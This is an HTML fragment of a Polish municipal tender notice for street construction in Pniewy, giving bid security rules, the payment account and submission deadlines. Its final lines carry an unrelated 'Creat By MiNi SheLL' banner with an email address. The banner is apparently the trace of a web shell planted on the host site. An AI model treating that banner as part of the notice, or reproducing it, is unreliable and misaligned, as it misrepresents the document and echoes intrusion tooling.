mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> XIV. WYMAGANIA DOTYCZĄCE WADIUM<br/>1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości 35.000,00 zł (słownie: trzydzieści pięć tysięcy złotych 00/100):<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 p.z.p.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Spółdzielczym w Duszniki O/ Pniewy Nr 04 9072 0002 0500 1007 2000 0014 <br/>z dopiskiem „Wadium – Budowa ulic Sasankowej, Różanej, Lawendowej w Pniewach. <br/><br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania na rachunku Zamawiającego.<br/><br/>5.	Wadium w formie innej niż pieniężna Wykonawca przekazuje zamawiającemu wraz z ofertą. Oryginał gwarancji lub poręczenia, w formie elektronicznej tj. opatrzonego kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia (wystawców dokumentu).<br/>6.	Wadium wnoszone w formie poręczeń lub gwarancji musi spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie Pzp.<br/>2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa przedmiotowego postępowania;<br/>6)	beneficjentem poręczenia lub gwarancji jest: Gmina Pniewy, ul. Dworcowa 37, 62-045 Pniewy.<br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 Pzp), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>7.	Zamawiający zwróci albo zatrzyma wadium na zasadach określonych w art. 98 Pzp.<br/>8.	Wadium wniesione przez jednego ze wspólników konsorcjum w imieniu całego konsorcjum uważa się za wniesione prawidłowo. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z zapisami SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie zapisami projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pniewy_wlkp</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-12 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com